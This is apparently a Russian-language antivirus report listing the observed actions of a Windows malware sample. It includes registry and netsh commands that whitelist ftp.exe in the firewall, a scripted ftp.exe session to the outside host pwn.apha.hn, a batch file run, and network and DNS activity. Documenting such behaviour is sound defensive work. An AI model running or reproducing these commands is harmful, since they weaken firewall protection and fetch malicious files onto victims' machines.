Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:RPC'
- <SYSTEM32>\ftp.exe -n -v -s:%WINDIR%\system\script pwn.apha.hn
- <SYSTEM32>\cmd.exe /c ""%WINDIR%\system\init.bat" "
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\ftp.exe RPC
- %WINDIR%\system\script
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\orkut[1]
- %WINDIR%\system\init.bat
- %WINDIR%\system\init.bat
- %WINDIR%\system\script
- 'localhost':1040
- 'localhost':1045
- 'pw#.apha.hn':21
- 'localhost':1037
- 'www.or##t.com':80
- www.or##t.com/
- DNS ASK pw#.apha.hn
- DNS ASK www.or##t.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''